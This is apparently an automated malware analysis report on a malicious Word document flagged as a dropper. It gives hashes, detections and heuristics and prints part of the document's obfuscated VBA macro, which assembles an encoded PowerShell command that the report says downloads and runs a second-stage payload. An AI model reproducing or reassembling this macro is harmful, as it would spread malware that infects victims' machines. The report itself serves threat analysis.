Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a5fd8cb05ab36684…

MALICIOUS

Office (OLE)

Size: 86.2 KB
Created: 2018-08-18 01:14:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 95455a54a020e42a5e0397844241cbed
SHA-1: ef299a84d909f486cac5d258f7f17d2f871877cf
SHA-256: a5fd8cb05ab36684f977cc5151f0fa125a30951e96ea1ee2edb5d4cf8c310a78
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Valyria-6667982-0. It contains a VBA macro with an AutoOpen function that executes a shell command on document open. The macro is heavily obfuscated (string fragments joined at run time, interleaved with no-op calls such as VarType and IsArray), but its intent is to download and execute a second-stage payload, which is common dropper behavior.

Heuristics 6

  • ClamAV: Doc.Dropper.Valyria-6667982-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6667982-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 43919 bytes
SHA-256: a8e309de92c5fca7d2ea1d27542f42e6d17bd7ef550d3d38e92291ea95db0b7b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iccFcBSZv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KtIiqSZrzjn"
Function zDIiQMhj()
On Error Resume Next
VarType 261065630
   IsArray dQzvj
bQhLCTlt = "Md  /v" + "^ " + " ^" + "   /C " + "  "
VarType Round(Vziqbz)
   VarType Cos(6806 * uzMij * 15814 / FMcAhY)
QNzDNG = CStr(Chr(QzHTANLWficQ + kFJFYwu + 34 + TRfzArCfjOzz + RncSIjJhU)) + " " + "Set^ ^ " + " ^I^" + "F^=xo^" + "@^{r" + "^}[{^l^"
SJiuRf = CVar(7)
   VarType hBNNa
urcflNfP = "l " + "-^{^ ^" + "JA^B^" + "QAE(" + "^AU^@" + "A^%^" + "A^G4" + "AZ^QB" + "3AC^0Ab" + "@BiAGo"
VarType CVar(29276969)
   VarType 63
   SJiuRf = GuFjBk
GdmMuDzrkw = "^A^Z" + "QBj^A" + "^H^Q" + "^A#A^" + "B^O^A^G" + "^U^A^d^"
IsArray Second(adcVa + tAhvkf * 74368 + CVjbk)
   VarType WvsqE
   SJiuRf = 3250
rsVRJU = "A" + "^A^uA" + "Fc" + "AZ^QB^" + "i^AE" + "^M^" + "A" + "b^AB" + "^x^A" + "^G^UAb"
SJiuRf = Fix(44060 * MVkUi)
   VarType TimeValue(qIPwwl)
hjjoBaooViw = "g^B" + "0^" + "AD^}A^J" + "^A" + "B^aAE" + "MA^d^@^" + "A^%" + "^ACc^" + "Aa^AB"
VarType Round(FBGAK)
   SJiuRf = Log(258643195)
anIKGoWcMX = "^" + "0A^" + "HQAcAA^" + "6^AC" + "(A^L@^"
SJiuRf = Cos(50225 * PUlMf - lNLAwO / 47311)
   SJiuRf = 31
sOFrkjIvGcG = "B+AH^#" + "A^" + "Z^Q^" + "Bz" + "^AG" + "g^Abg" + "^B^}^" + "A"
IsArray CDate(JFfzFw)
   SJiuRf = CDate(RjhmQ + bbnti - 80726 - zKcLAH)
wazXG = "^G" + "^EA" + "^d^Q^B" + "u^AGQA" + "c^gB"
VarType 747
   SJiuRf = CDec(ciYrAG)
   SJiuRf = 4
iAJTTbFTLTM = "^5^AC^" + "4A^Y" + "@BvAG0" + "A^L@B^" + "'^" + "A^G^0^A" + "VQ^BA^" + "AG" + "gA" + "d^AB^0" + "^AHA^"
SJiuRf = Month(ZlGvP)
   SJiuRf = CBool(2)
QrLUzqUK = "A" + "^Og^" + "Av" + "AC(AY^" + "gBy^AGE" + "AdgB^l^" + "AHc^A" + "^a" + "QB" + "^}^A"
VarType 516857644
   VarType Month(121588101)
maBNzNDnz = "^" + "G@" + "AL^g^Bv" + "^AH^#^" + "A^"
zDIiQMhj = bQhLCTlt + QNzDNG + urcflNfP + GdmMuDzrkw + rsVRJU + hjjoBaooViw + anIKGoWcMX + sOFrkjIvGcG + wazXG + iAJTTbFTLTM + QrLUzqUK + maBNzNDnz
   VarType 3
   VarType TimeValue(5)
   VarType 6
End Function
Function FhRMjqmQm()
On Error Resume Next
SJiuRf = Cos(52492 * pLXRX)
   IsArray CDbl(ARGwD)
   IsArray HLvRk
KIMmoOa = "Z^@Av^A" + "D" + "UA" + "Vg^BL^A" + "^EEA" + "aAB^" + "yAEAAa^" + "AB^0" + "A^HQA" + "cA" + "^A^6^A" + "C(^"
VarType Sin(2177 + 80601 / SjmERk / sikzh)
   VarType Str(7231)
   VarType cUGiIR
mhBEG = "A^" + "L^@B^5^" + "AHAAc" + "@^B^" + "x^A^" + "G^Y" + "A^ZQB^" + "zA"
VarType REsZXH
   IsArray Cos(VpwoKM)
   IsArray FDZFbZ
twqKJu = "^HQAL^" + "gB^" + "jAG(AbQ" + "^" + "Av^" + "AHg^AY" + "^g^B"
SJiuRf = Round(IwTWjP * EHmNsa / WIIMj - wRHXzD)
   VarType 9455
itQUo = "^yAF" + "^" + "k^A^b^" + "@^" + "B^A^AGg" + "^A^d^A^"
VarType sRXvP
   IsArray Hex(3)
FnbOYXQHji = "B0^AHAA" + "^" + "O^gAvA" + "C" + "(^" + "Ab" + "^g" + "B[" + "^A^H^o^" + "A^Y^Q"
SJiuRf = Second(ZSjCaU)
   VarType 85742947
   IsArray CzSMDs
jEjiwIfzwR = "^B^y^" + "A^" + "HM^A" + "cABv" + "^A" + "H^Q^A" + "^" + "L^gB" + "^jA^G(" + "A"
VarType Tan(vZdBTj)
   VarType Sqr(8)
   VarType Tan(3)
rahjzBz = "bQAu^" + "A^H" + "^QAc^" + "gA" + "v" + "A^GQ" + "^AV^A^" + "Bv^AGY^" + "AQQ" + "^A^"
SJiuRf = Val(59808 - NzqYK - 18785 - PhDIY)
   IsArray CStr(blfOi)
duVaaDdP = "zA^EAAa" + "^" + "A^B^0A" + "^HQA" + "cA" + "^A6AC(^" + "AL@Bz^A"
IsArray MrKXw
   VarType fYTzco
   SJiuRf = Sin(329)
CpjpqY = "^HU" + "^A^" + "a" + "^Q^B" + "j" + "^AGkA^" + "Z^A^B" + "^l" + "^A^HA^A"
IsArray 2
   SJiuRf = 997
   SJiuRf = CCur(aJsRE)
VzqJj = "cgBlAHY" + "^A^" + "ZQB" + "^u^A^HQ" + "A" + "^a" + "^Q^" + "Bv^A^G" + "^4^"
VarType Oct(nzNmLM)
   IsArray CDate(SPhqO)
hihZf = "Ac^A" + "BvA^" + "H#Ad" + "A" + "^B^[A^" + "GcAZ" + "^Q^" + "Bj^A^G" + "(^AdQ" + "^B^u^A" + "H^QA" + "{QA"
SJiuRf = 3232
   SJiuRf = Fix(58307 + ZCWdKr)
   IsArray 32
dhFwUCBmB = "^u^AG(^" + "Ac" + "g^" + "Bn^AC("
... (truncated)